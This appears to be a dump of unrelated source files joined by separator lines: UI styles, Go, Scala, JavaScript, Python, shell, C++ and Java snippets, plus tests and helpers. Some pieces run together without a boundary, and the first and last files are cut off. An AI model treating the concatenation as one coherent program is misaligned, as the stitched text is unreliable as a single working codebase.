borderColor: '#F3E6FF',
borderWidth: 1.5
},
addAsset__text: {
fontSize: 10,
color: '#F3E6FF',
fontFamily: 'Montserrat-Bold'
},
addAsset__icon: {
marginRight: 2,
marginTop: 1,
color: '#F3E6FF'
},
snowBtn__icon: {
color: '#F3E6FF'
}
}
|
<reponame>sthagen/drone-drone
// Copyright 2019 Drone.IO Inc. All rights reserved.
// Use of this source code is governed by the Drone Non-Commercial License
// that can be found in the LICENSE file.
// +build !oss
package template
import (
"net/http"
"github.com/drone/drone/core"
"github.com/drone/drone/handler/api/render"
"github.com/go-chi/chi"
)
// HandleFind returns an http.HandlerFunc that writes json-encoded
// template details to the response body.
func HandleFind(templateStore core.TemplateStore) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		// The template is addressed by namespace + name taken from the route.
		var (
			name      = chi.URLParam(r, "name")
			namespace = chi.URLParam(r, "namespace")
		)
		template, err := templateStore.FindName(r.Context(), name, namespace)
		if err != nil {
			render.NotFound(w, err)
			return
		}
		render.JSON(w, template, 200)
	}
}
|
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/1024+0+512-shuffled-N-VB/13-model --tokenizer_name model-configs/1536-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/1024+0+512-shuffled-N-VB/13-0+1024+512-first-256 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function identity_sixth --eval_function penultimate_sixth_eval |
/*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
export { EuiColorPicker, EuiColorPickerProps } from './color_picker';
export {
EuiColorPickerSwatch,
EuiColorPickerSwatchProps,
} from './color_picker_swatch';
export { EuiHue, EuiHueProps } from './hue';
export { EuiSaturation, EuiSaturationProps } from './saturation';
export { EuiColorStops } from './color_stops';
// TODO: Exporting `EuiColorStopsProps` from `'./color_stops'`
// results in a duplicate d.ts entry that causes build warnings
// and potential downstream TS project failures.
export { EuiColorStopsProps } from './color_stops/color_stops';
export {
EuiColorPalettePicker,
EuiColorPalettePickerProps,
EuiColorPalettePickerPaletteProps,
} from './color_palette_picker';
export {
EuiColorPaletteDisplay,
EuiColorPaletteDisplayProps,
} from './color_palette_display';
|
<reponame>ryan-richt/evilplot<filename>js/src/main/scala/com/cibo/evilplot/EvilPlot.scala<gh_stars>0
/*
* Copyright (c) 2018, CiBO Technologies, Inc.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its contributors
* may be used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.cibo.evilplot
import java.util.UUID
import com.cibo.evilplot.colors.{Color, DefaultColors, HEX, HTMLNamedColors}
import com.cibo.evilplot.demo.DemoPlots
import com.cibo.evilplot.geometry.Clipping.Edge
import com.cibo.evilplot.geometry._
import com.cibo.evilplot.numeric.Point
import com.cibo.evilplot.plot.{LinePlot, Overlay}
import com.cibo.evilplot.plot.renderers.PathRenderer
import org.scalajs.dom
import org.scalajs.dom.CanvasRenderingContext2D
import org.scalajs.dom.raw.HTMLCanvasElement
import scala.scalajs.js.annotation.{JSExport, JSExportTopLevel}
@JSExportTopLevel("EvilPlot")
object EvilPlot {

  /** Render a plot definition to the specified canvas at the given size. */
  @JSExport
  def renderEvilPlot(json: String, canvasId: String, width: Double, height: Double): Unit = {
    renderEvilPlot(json, canvasId, Some(Extent(width, height)))
  }

  /** Render a plot definition to the specified canvas at the plot's own size. */
  @JSExport
  def renderEvilPlot(json: String, canvasId: String): Unit = {
    renderEvilPlot(json, canvasId, None)
  }

  /** Decode the JSON plot definition and delegate to the Drawable overload. */
  def renderEvilPlot(json: String, canvasId: String, size: Option[Extent]): Unit = {
    val definition = JSONUtils.decodeStr[Drawable](json)
    renderEvilPlot(definition, canvasId, size)
  }

  /** Draw the given plot onto the canvas, fitted to `size` (or its own extent). */
  def renderEvilPlot(plot: Drawable, canvasId: String, size: Option[Extent]): Unit = {
    val paddingHack = 20
    // FIX: `size` was previously ignored — canvas and fitted extent were always
    // derived from plot.extent, so the (json, id, width, height) overload
    // silently dropped the caller's requested dimensions.
    val targetExtent = size.getOrElse(plot.extent)
    val ctx = prepareCanvas(canvasId, targetExtent)
    val paddedSize = Extent(targetExtent.width - paddingHack, targetExtent.height - paddingHack)
    fit(plot padAll paddingHack / 2, paddedSize).draw(CanvasRenderContext(ctx))
  }

  /** Render the example plots, each on its own freshly created canvas.
    * NOTE(review): the `canvasId` parameter is unused — kept for API stability.
    */
  @JSExport
  def renderExample(canvasId: String): Unit = {
    addExample(DemoPlots.simpleGroupedPlot)
    addExample(DemoPlots.simpleContinuousPlot)
    addExample(DemoPlots.simpleCartesianPlot)
    addExample(DemoPlots.densityPlot)
    addExample(DemoPlots.legendFeatures)
    addExample(DemoPlots.axesTesting)
    addExample(DemoPlots.functionPlot)
    addExample(DemoPlots.markerPlot)
    addExample(DemoPlots.scatterPlot)
    addExample(DemoPlots.barChart)
    addExample(DemoPlots.boxPlot)
    addExample(DemoPlots.clusteredBoxPlot)
    addExample(DemoPlots.facetedPlot)
    addExample(DemoPlots.heatmap)
    addExample(DemoPlots.marginalHistogram)
    addExample(DemoPlots.clusteredBarChart)
    addExample(DemoPlots.stackedBarChart)
    addExample(DemoPlots.clusteredStackedBarChart)
  }

  /** Create a full-window canvas under a fresh id and draw the plot onto it. */
  private def addExample(plot: Drawable): Unit = {
    val canvasId = UUID.randomUUID().toString
    val screenWidth = dom.window.innerWidth
    val screenHeight = dom.window.innerHeight
    val canvas = dom.document.createElement("canvas").asInstanceOf[HTMLCanvasElement]
    canvas.setAttribute("id", canvasId)
    dom.document.body.appendChild(canvas)
    val ctx = CanvasRenderContext(prepareCanvas(canvasId, Extent(screenWidth, screenHeight)))
    plot.padAll(10).draw(ctx)
  }

  /** Append one 40x40 inline swatch per colour to the element with id "palette". */
  def renderPaletteExample(colors: Seq[Color]): Unit = {
    val paletteID = "palette"
    val div = dom.document.getElementById(paletteID)
    colors.foreach { color =>
      val element = dom.document.createElement("div")
      element.setAttribute(
        "style",
        s"width: 40px; " +
          s"height: 40px; " +
          s"display: inline-block;" +
          s"background-color: ${color.repr};")
      div.appendChild(element)
    }
  }

  /** Size the canvas (backed at 2x resolution for crispness) and return its 2D context. */
  private def prepareCanvas(
    id: String,
    extent: Extent
  ): CanvasRenderingContext2D = {
    val ctx = Utils.getCanvasFromElementId(id)
    val canvasResolutionScaleHack = 2
    ctx.canvas.style.width = extent.width + "px"
    ctx.canvas.style.height = extent.height + "px"
    ctx.canvas.width = extent.width.toInt * canvasResolutionScaleHack
    ctx.canvas.height = extent.height.toInt * canvasResolutionScaleHack
    ctx.scale(canvasResolutionScaleHack, canvasResolutionScaleHack)
    ctx
  }
}
|
// Default options shared by all API calls: JSON payloads, and cookies sent
// with every request ('include' sends credentials even cross-origin).
export const fetchOptions = {
    method: 'GET',
    credentials: 'include',
    headers: {
        'Content-Type': 'application/json',
    },
};
// POST `data` as a JSON body to `endpoint` (with the shared default options)
// and resolve with the parsed JSON response.
export async function post(endpoint, data) {
    const response = await fetch(endpoint, {
        ...fetchOptions,
        method: 'POST',
        body: JSON.stringify(data),
    });
    return response.json();
}
// GET `endpoint` with the shared default options and resolve with the parsed
// JSON response.
export async function get(endpoint) {
    const response = await fetch(endpoint, fetchOptions);
    return response.json();
}
|
'use strict';
const chai = require('chai');
const expect = chai.expect;
const sinonChai = require('sinon-chai');
chai.use(sinonChai);
const VoteCollector = require('../VoteCollector');
// Unit tests for VoteCollector.collectVotesFromResult, which aggregates a
// DB-style result set ({ rows: [{ vote, count }] }) into { a, b } totals.
describe('Collect from result', () =>{
    // A single row for 'a' is counted; 'b' defaults to 0.
    it('Vote only for "a"', (done) =>{
        let res = VoteCollector.collectVotesFromResult({
            rows: [
                {
                    vote: 'a',
                    count: '12'
                }
            ]
        });
        expect(res.a).to.equal(12);
        expect(res.b).to.equal(0);
        done();
    });
    // Symmetric case: a single row for 'b'.
    it('Vote only for "b"', (done) =>{
        var res = VoteCollector.collectVotesFromResult({
            rows: [
                {
                    vote: 'b',
                    count: '12'
                }
            ]
        });
        expect(res.a).to.equal(0);
        expect(res.b).to.equal(12);
        done();
    });
    // Empty result set: both totals are 0.
    it('No vote', (done) =>{
        var res = VoteCollector.collectVotesFromResult({
            rows: [
            ]
        });
        expect(res.a).to.equal(0);
        expect(res.b).to.equal(0);
        done();
    });
    // Rows for unknown parties ('C') are ignored, not counted toward a or b.
    it('No vote with different properties', (done) =>{
        var res = VoteCollector.collectVotesFromResult({
            rows: [
                {
                    vote: 'C',
                    count: '12'
                }
            ]
        });
        expect(res.a).to.equal(0);
        expect(res.b).to.equal(0);
        done();
    });
    // Rows for both parties are tallied independently.
    it('vote to two parties', (done) =>{
        var res = VoteCollector.collectVotesFromResult({
            rows: [
                {
                    vote: 'a',
                    count: '1'
                },
                {
                    vote: 'b',
                    count: '2'
                }
            ]
        });
        expect(res.a).to.equal(1);
        expect(res.b).to.equal(2);
        done();
    });
    // NOTE(review): duplicate test description — this actually checks that a
    // missing argument raises a TypeError; consider renaming for clarity.
    it('vote to two parties', (done) =>{
        try{
            VoteCollector.collectVotesFromResult();
            done(new Error('Validation should have failed'));
        }catch(e){
            console.log(JSON.stringify(e));
            expect(e.name).to.contain('TypeError');
            done();
        }
    });
});
|
# Example: list the words of a sentence in alphabetical order.
sentence = "The quick brown fox jumped over the lazy dog."

# Split sentence into words
words = sentence.split()

# Sort list of words alphabetically, case-insensitively.
# BUG FIX: a plain words.sort() orders by ASCII code, which places every
# capitalised word ("The") before all lowercase words — not the alphabetical
# order the claimed output suggested. key=str.lower gives true alphabetical
# order; the sort is stable, so "The" keeps its original position before "the".
words.sort(key=str.lower)

# Print sorted list of words
print(words)
# Output: ['brown', 'dog.', 'fox', 'jumped', 'lazy', 'over', 'quick', 'The', 'the']
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# This file is meant to be sourced, not executed: it exports SOURCE_DIR,
# BUILD_DIR ($1, default "build"), INSTALL_DIR ($2, default "install"),
# and prepends the local Python site-packages and bin directories to
# PYTHONPATH/PATH. It must be sourced from its own directory so relative
# paths resolve.
if [[ ! -f config.sh ]]; then
    echo "You must source config.sh from within its own directory"
    return
fi

# Quote expansions so paths containing spaces survive word splitting.
export SOURCE_DIR="$(pwd)"
export BUILD_DIR="$SOURCE_DIR/${1:-build}"
export INSTALL_DIR="$SOURCE_DIR/${2:-install}"

# Prefer "python", falling back to "python3" (modern $() replaces backticks).
PYTHON_BIN="$(type -P python || type -P python3)"
# NOTE(review): distutils was removed in Python 3.12; consider migrating to
# sysconfig.get_path() when the minimum Python version allows.
PYTHON_LIB="$("${PYTHON_BIN}" -c "from distutils.sysconfig import get_python_lib; print(get_python_lib(prefix='$INSTALL_DIR'))")"
export PYTHONPATH="$PYTHON_LIB:$PYTHONPATH"
export PATH="$INSTALL_DIR/sbin:$INSTALL_DIR/bin:$SOURCE_DIR/bin:$PATH"
|
#!/bin/sh
set -e

# Fail fast when a required variable is missing or empty.
# FIX: quote the expansions — unquoted `[ -z $VAR ]` degenerates to the
# one-argument form `[ -z ]` when unset (true only by accident) and errors
# out if the value contains whitespace.
if [ -z "$BASIC_AUTH_USERNAME" ]; then
  echo >&2 "BASIC_AUTH_USERNAME must be set"
  exit 1
fi
if [ -z "$BASIC_AUTH_PASSWORD" ]; then
  echo >&2 "BASIC_AUTH_PASSWORD must be set"
  exit 1
fi
if [ -z "$PROXY_PASS" ]; then
  echo >&2 "PROXY_PASS must be set"
  exit 1
fi

# Build the HTTP Basic auth header. FIX: `echo -n` is not portable under
# /bin/sh (some implementations print a literal "-n"); printf '%s' is POSIX.
export AUTHORIZATION_HEADER="Basic $(printf '%s' "${BASIC_AUTH_USERNAME}:${BASIC_AUTH_PASSWORD}" | base64)"

# Instantiate the nginx config from its template ('|' delimiters are used for
# values that may contain slashes), then run nginx in the foreground so the
# container stays alive.
sed \
  -e "s/##WORKER_PROCESSES##/$WORKER_PROCESSES/g" \
  -e "s/##SERVER_NAME##/$SERVER_NAME/g" \
  -e "s/##PORT##/$PORT/g" \
  -e "s|##PROXY_PASS##|$PROXY_PASS|g" \
  -e "s|##AUTHORIZATION_HEADER##|$AUTHORIZATION_HEADER|g" \
  nginx.conf.tmpl > /etc/nginx/nginx.conf

nginx -g "daemon off;"
|
// $resource wrapper for the performances REST endpoint; `update` maps to PUT
// and `@id` binds the entity's id into the URL.
angular.module('ticketmonster').factory('PerformanceResource', function($resource){
    return $resource(
        '../rest/performances/:PerformanceId',
        { PerformanceId: '@id' },
        {
            queryAll: { method: 'GET', isArray: true },
            query: { method: 'GET', isArray: false },
            update: { method: 'PUT' }
        }
    );
});
// Affirmative / negative responses recognised by client.verify() below —
// several languages plus slang variants; matching is done on the lowercased
// message content.
const yes = ['true', 'yes', 'y', 'да', 'ye', 'yeah', 'yup', 'yea', 'ya', 'yas', 'yuh', 'yee', 'i guess', 'fosho', 'yis', 'hai', 'da', 'si', 'sí', 'oui', 'はい', 'correct', 'perhaps', 'absolutely', 'sure'];
const no = ['false', 'no', 'n', 'nah', 'eat shit', 'nah foo', 'nope', 'nop', 'die', 'いいえ', 'non', 'fuck off', 'absolutely not'];
// Attaches shared helper functions onto the Discord client instance.
module.exports = client => {
  // Load a command module from ../commands, validate its conf/help metadata,
  // and register it (plus its aliases) on the client's collections.
  client.load = async command => {
    const props = require(`../commands/${command}`);
    if (!props.conf || !props.help) return client.logger.error(`${command} failed to load as it is missing required command configuration`);
    if (props.conf.enabled !== true) return client.logger.log(`${props.help.name} is disabled.`);
    client.logger.log(`Loading Command: ${props.help.name}. 👌`);
    if (props.help.name !== command.split('.')[0]) client.logger.warn(`File name ${command} has a different command name ${props.help.name}`);
    client.commands.set(props.help.name, props);
    props.conf.aliases.forEach(alias => {
      client.logger.log(`Loading Alias: ${alias}. 👌`);
      client.aliases.set(alias, props.help.name);
    });
  };
  // Remove a command (looked up by name or alias) from the client collections
  // and evict its module from the require cache so it can be re-required.
  client.unloadCommand = async commandName => {
    let command;
    if (client.commands.has(commandName)) {
      command = client.commands.get(commandName);
    } else if (client.aliases.has(commandName)) {
      command = client.commands.get(client.aliases.get(commandName));
    }
    if (!command) return `The command \`${commandName}\` doesn't seem to exist, nor is it an alias. Try again!`;
    client.logger.log(`Unloading Command: ${command.help.name}. 👌`);
    client.commands.delete(command.help.name);
    command.conf.aliases.forEach(alias => {
      client.logger.log(`Unloading Alias: ${alias}. 👌`);
      client.aliases.delete(alias);
    });
    delete require.cache[require.resolve(`../commands/${command.help.name}.js`)];
    return `Successfully unloaded ${command.help.name}`;
  };
  /*
  PERMISSION LEVEL FUNCTION
  This is a very basic permission system for commands which uses "levels"
  0 = member
  2 = mod
  3 = admin
  4 = guild owner
  10 = bot owner
  */
  // Returns the highest permission level the message author qualifies for;
  // later checks deliberately override earlier ones.
  client.elevation = message => {
    let permlvl = 0;
    if (message.member.hasPermission('MANAGE_MESSAGES'))
      permlvl = 2;
    if (message.member.hasPermission('ADMINISTRATOR') || message.member.hasPermission('MANAGE_GUILD'))
      permlvl = 3;
    if (message.author.id == message.guild.ownerID) permlvl = 4;
    if (message.author.id === client.settings.owner_id) permlvl = 10;
    return permlvl;
  };
  // Ask `user` a yes/no question in `channel` and await their reply.
  // Returns true/false for a recognised answer, 0 on timeout (note: 0, not
  // false, so callers can distinguish "said no" from "never answered").
  client.verify = async (channel, user, { time = 30000, extraYes = [], extraNo = [] } = {}) => {
    if (client.blacklist.includes(user.id)) return channel.send(`${user.tag} is currently blacklisted`);
    const filter = res => {
      const value = res.content.toLowerCase();
      return (user ? res.author.id === user.id : true)
        && (yes.includes(value) || no.includes(value) || extraYes.includes(value) || extraNo.includes(value));
    };
    const verify = await channel.awaitMessages(filter, {
      max: 1,
      time,
      errors: ['time']
    });
    if (!verify.size) return 0;
    const choice = verify.first().content.toLowerCase();
    if (yes.includes(choice) || extraYes.includes(choice)) return true;
    if (no.includes(choice) || extraNo.includes(choice)) return false;
    return false;
  };
  /*
  MESSAGE CLEAN FUNCTION
  "Clean" removes @everyone pings, as well as tokens, and makes code blocks
  escaped so they're shown more easily. As a bonus it resolves promises
  and stringifies objects!
  This is mostly only used by the Eval and Exec commands.
  */
  client.clean = async (text) => {
    if (text && text.constructor.name == 'Promise')
      text = await text;
    if (typeof text !== 'string')
      text = require('util').inspect(text, {depth: 1});
    // Insert a zero-width space after '@' so mentions cannot ping.
    text = text
      .replace(/@/g, '@' + String.fromCharCode(8203))
      .replace(client.token, 'NO TOKEN');
    return text;
  };
  /* MISCELANEOUS NON-CRITICAL FUNCTIONS */
  // EXTENDING NATIVE TYPES IS BAD PRACTICE. Why? Because if JavaScript adds this
  // later, this conflicts with native code. Also, if some other lib you use does
  // this, a conflict also occurs. KNOWING THIS however, the following 2 methods
  // are, we feel, very useful in code.
  // <String>.toPropercase() returns a proper-cased string such as:
  // "<NAME> a little lamb".toProperCase() returns "<NAME> A Little Lamb"
  Object.defineProperty(String.prototype, 'toProperCase', {
    value: function() {
      return this.replace(/([^\W_]+[^\s-]*) */g, (txt) => txt.charAt(0).toUpperCase() + txt.substr(1).toLowerCase());
    }
  });
  // <Array>.random() returns a single random element from an array
  // [1, 2, 3, 4, 5].random() can return 1, 2, 3, 4 or 5.
  Object.defineProperty(Array.prototype, 'random', {
    value: function() {
      return this[Math.floor(Math.random() * this.length)];
    }
  });
  // <Array>.shuffle() returns a Fisher–Yates-shuffled copy (original untouched).
  Object.defineProperty(Array.prototype, 'shuffle', {
    value: function() {
      const arr = this.slice(0);
      for (let i = arr.length - 1; i >= 0; i--) {
        const j = Math.floor(Math.random() * (i + 1));
        const temp = arr[i];
        arr[i] = arr[j];
        arr[j] = temp;
      }
      return arr;
    }
  });
  // Locale-format a number with at most 2 fraction digits.
  client.formatNumber = (number, minimumFractionDigits = 0) => {
    return Number.parseFloat(number).toLocaleString(undefined, {
      minimumFractionDigits,
      maximumFractionDigits: 2
    });
  };
  // `await client.wait(1000);` to "pause" for 1 second.
  client.wait = require('util').promisify(setTimeout);
  // These 2 process methods will catch exceptions and give *more details* about the error and stack trace.
  process.on('uncaughtException', err => {
    client.logger.error(`UNCAUGHT EXCEPTION: ${err.message}`);
    client.logger.error(err.stack);
    process.exit(1);
  });
  process.on('unhandledRejection', err => {
    client.logger.error(`UNHANDLED REJECTION: ${err.message}`);
    client.logger.error(err.stack);
  });
};
|
// Copyright 2020 The Chromium OS Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "dlcservice/test_utils.h"
#include <string>
#include <utility>
#include <vector>
#include <base/files/file_path.h>
#include <base/files/file_util.h>
#include <base/files/scoped_temp_dir.h>
#include <dbus/dlcservice/dbus-constants.h>
#include <gmock/gmock.h>
#include <gtest/gtest.h>
#include <imageloader/dbus-proxy-mocks.h>
#include <metrics/metrics_library_mock.h>
#include <update_engine/dbus-constants.h>
#include <update_engine/dbus-proxy-mocks.h>
#include "dlcservice/boot/boot_slot.h"
#include "dlcservice/dlc.h"
#include "dlcservice/metrics.h"
#include "dlcservice/system_state.h"
#include "dlcservice/utils.h"
using std::string;
using std::vector;
using testing::_;
using testing::Return;
using testing::SetArgPointee;
using testing::StrictMock;
namespace dlcservice {
// Fixture constants: three test DLC ids, the package name used by every test
// DLC, and a placeholder Omaha URL.
const char kFirstDlc[] = "first-dlc";
const char kSecondDlc[] = "second-dlc";
const char kThirdDlc[] = "third-dlc";
const char kPackage[] = "package";
const char kDefaultOmahaUrl[] = "http://foo-url";
// Constructs the strict D-Bus proxy mocks and the mock boot device. The boot
// device reports "/dev/sdb5" once and is never removable.
BaseTest::BaseTest() {
  // Create mocks with default behaviors.
  mock_image_loader_proxy_ =
      std::make_unique<StrictMock<ImageLoaderProxyMock>>();
  mock_image_loader_proxy_ptr_ = mock_image_loader_proxy_.get();
  mock_update_engine_proxy_ =
      std::make_unique<StrictMock<UpdateEngineProxyMock>>();
  mock_update_engine_proxy_ptr_ = mock_update_engine_proxy_.get();
  mock_session_manager_proxy_ =
      std::make_unique<StrictMock<SessionManagerProxyMock>>();
  mock_session_manager_proxy_ptr_ = mock_session_manager_proxy_.get();
  mock_boot_device_ = std::make_unique<MockBootDevice>();
  mock_boot_device_ptr_ = mock_boot_device_.get();
  EXPECT_CALL(*mock_boot_device_, GetBootDevice())
      .WillOnce(Return("/dev/sdb5"));
  ON_CALL(*mock_boot_device_, IsRemovableDevice(_))
      .WillByDefault(Return(false));
  EXPECT_CALL(*mock_boot_device_, IsRemovableDevice(_)).Times(1);
}
// Wires the mocks into the test-mode SystemState singleton. Raw observer
// pointers (mock_metrics_, mock_system_properties_) are kept for expectations;
// ownership moves into SystemState.
void BaseTest::SetUp() {
  loop_.SetAsCurrent();
  SetUpFilesAndDirectories();
  auto mock_metrics = std::make_unique<testing::StrictMock<MockMetrics>>();
  mock_metrics_ = mock_metrics.get();
  auto mock_system_properties =
      std::make_unique<testing::StrictMock<MockSystemProperties>>();
  mock_system_properties_ = mock_system_properties.get();
  SystemState::Initialize(
      std::move(mock_image_loader_proxy_), std::move(mock_update_engine_proxy_),
      std::move(mock_session_manager_proxy_), &mock_state_change_reporter_,
      std::make_unique<BootSlot>(std::move(mock_boot_device_)),
      std::move(mock_metrics), std::move(mock_system_properties),
      manifest_path_, preloaded_content_path_, content_path_, prefs_path_,
      users_path_, &clock_,
      /*for_test=*/true);
}
// Creates the temp directory layout dlcservice expects and copies each DLC's
// manifest from $SRC/testdata into the fake rootfs manifest tree.
void BaseTest::SetUpFilesAndDirectories() {
  // Initialize DLC path.
  CHECK(scoped_temp_dir_.CreateUniqueTempDir());
  manifest_path_ = JoinPaths(scoped_temp_dir_.GetPath(), "rootfs");
  preloaded_content_path_ =
      JoinPaths(scoped_temp_dir_.GetPath(), "preloaded_stateful");
  content_path_ = JoinPaths(scoped_temp_dir_.GetPath(), "stateful");
  prefs_path_ = JoinPaths(scoped_temp_dir_.GetPath(), "var_lib_dlcservice");
  users_path_ = JoinPaths(scoped_temp_dir_.GetPath(), "users");
  mount_path_ = JoinPaths(scoped_temp_dir_.GetPath(), "mount");
  base::FilePath mount_root_path = JoinPaths(mount_path_, "root");
  base::CreateDirectory(manifest_path_);
  base::CreateDirectory(preloaded_content_path_);
  base::CreateDirectory(content_path_);
  base::CreateDirectory(prefs_path_);
  base::CreateDirectory(users_path_);
  base::CreateDirectory(mount_root_path);
  testdata_path_ = JoinPaths(getenv("SRC"), "testdata");
  // Create DLC manifest sub-directories.
  for (auto&& id : {kFirstDlc, kSecondDlc, kThirdDlc}) {
    base::CreateDirectory(JoinPaths(manifest_path_, id, kPackage));
    base::CopyFile(JoinPaths(testdata_path_, id, kPackage, kManifestName),
                   JoinPaths(manifest_path_, id, kPackage, kManifestName));
  }
}
// Test helper: size of |path| in bytes (EXPECTs that the file is readable).
int64_t GetFileSize(const base::FilePath& path) {
  int64_t file_size;
  EXPECT_TRUE(base::GetFileSize(path, &file_size));
  return file_size;
}
// Creates a preloaded image for |id| filled with '1' bytes of the manifest's
// size, and returns its path.
base::FilePath BaseTest::SetUpDlcPreloadedImage(const DlcId& id) {
  imageloader::Manifest manifest;
  dlcservice::GetDlcManifest(manifest_path_, id, kPackage, &manifest);
  base::FilePath image_path =
      JoinPaths(preloaded_content_path_, id, kPackage, kDlcImageFileName);
  CreateFile(image_path, manifest.size());
  EXPECT_TRUE(base::PathExists(image_path));
  string data(manifest.size(), '1');
  WriteToImage(image_path, data);
  return image_path;
}
// Will create |path/|id|/|package|/dlc_[a|b]/dlc.img files.
void BaseTest::SetUpDlcWithSlots(const DlcId& id) {
  imageloader::Manifest manifest;
  dlcservice::GetDlcManifest(manifest_path_, id, kPackage, &manifest);
  // Create DLC content sub-directories and empty images.
  for (const auto& slot : {BootSlot::Slot::A, BootSlot::Slot::B}) {
    base::FilePath image_path =
        GetDlcImagePath(content_path_, id, kPackage, slot);
    CreateFile(image_path, manifest.preallocated_size());
  }
}
// Simulates update_engine having installed the given DLCs by writing '1'-byte
// payloads into the active-slot image of each id.
void BaseTest::InstallWithUpdateEngine(const vector<string>& ids) {
  for (const auto& id : ids) {
    imageloader::Manifest manifest;
    dlcservice::GetDlcManifest(manifest_path_, id, kPackage, &manifest);
    base::FilePath image_path = GetDlcImagePath(
        content_path_, id, kPackage, SystemState::Get()->active_boot_slot());
    string data(manifest.size(), '1');
    WriteToImage(image_path, data);
  }
}
// Makes the image-loader mock report |mount_path_expected| (out-arg 3) from
// any LoadDlcImage call.
void BaseTest::SetMountPath(const string& mount_path_expected) {
  ON_CALL(*mock_image_loader_proxy_ptr_, LoadDlcImage(_, _, _, _, _, _))
      .WillByDefault(
          DoAll(SetArgPointee<3>(mount_path_expected), Return(true)));
}
}  // namespace dlcservice
|
from pyspark.sql import SparkSession
from pyspark.sql import functions as F

# Create a Spark session for this job.
spark = SparkSession.builder.appName("FilterDataFrame").getOrCreate()

# Load the input CSV, treating the first row as a header and letting Spark
# infer the column types.
df = spark.read.csv("input.csv", header=True, inferSchema=True)

# Count the writers earning under 100k.
is_cheap_writer = (F.col("Profession") == "Writer") & (F.col("Salary") < 100000)
filtered_count = df.filter(is_cheap_writer).count()

# Print the count of filtered records
print(filtered_count)
/**
 * Return every combination of `k` elements drawn from `arr`, in the same
 * lexicographic index order the original triple-loop version produced.
 *
 * Generalized: the original hard-coded combinations of size 3; `k` now makes
 * the size configurable while defaulting to 3 for backward compatibility.
 *
 * @param {Array} arr - source array
 * @param {number} [k=3] - number of elements per combination
 * @returns {Array<Array>} all k-element combinations (empty if arr.length < k)
 */
function findCombinations(arr, k = 3) {
  const combinations = [];
  // Depth-first builder: `current` is the partial combination, `start` is the
  // first index still eligible, so each element is used at most once.
  const build = (start, current) => {
    if (current.length === k) {
      combinations.push(current.slice());
      return;
    }
    for (let i = start; i < arr.length; i++) {
      current.push(arr[i]);
      build(i + 1, current);
      current.pop();
    }
  };
  build(0, []);
  return combinations;
}
// Demo: print every 3-element combination of [1..5].
const input = [1, 2, 3, 4, 5];
console.log(findCombinations(input));
// Output: [[1,2,3],[1,2,4],[1,2,5],[1,3,4],[1,3,5],[1,4,5],
//          [2,3,4],[2,3,5],[2,4,5],[3,4,5]]
#!/bin/sh
# Start a Mutagen sync session mirroring the local ./src directory into the
# docker-compose "workspace" container at /workspace/src; symlinks are not
# propagated (--symlink-mode ignore).
mutagen create \
    --symlink-mode ignore \
    src docker://$(docker-compose ps -q workspace)/workspace/src
|
<reponame>ch1huizong/learning
def logical_lines(physical_lines, joiner=''.join, separator=''):
    """Collapse backslash-continued physical lines into logical lines.

    The physical lines are concatenated with ``joiner``, each
    backslash-newline continuation is replaced by ``separator``, and the
    result is split back into lines with their line endings preserved.
    """
    joined = joiner(physical_lines)
    unfolded = joined.replace('\\\n', separator)
    return unfolded.splitlines(True)
|
<filename>src/main/java/vcs/citydb/wfs/kvp/DropStoredQueryReader.java
package vcs.citydb.wfs.kvp;
import net.opengis.wfs._2.DropStoredQueryType;
import vcs.citydb.wfs.config.WFSConfig;
import vcs.citydb.wfs.exception.KVPParseException;
import vcs.citydb.wfs.exception.WFSException;
import vcs.citydb.wfs.exception.WFSExceptionCode;
import vcs.citydb.wfs.kvp.parser.StringParser;
import java.util.Map;
/**
 * Parses the KVP (key-value pair) form of a WFS 2.0 DropStoredQuery request.
 * Base parameters are delegated to {@link BaseRequestReader}; the optional
 * STOREDQUERY_ID parameter, when present, is parsed into the request id.
 */
public class DropStoredQueryReader extends KVPRequestReader {
    private final BaseRequestReader baseRequestReader;

    public DropStoredQueryReader(Map<String, String> parameters, WFSConfig wfsConfig) {
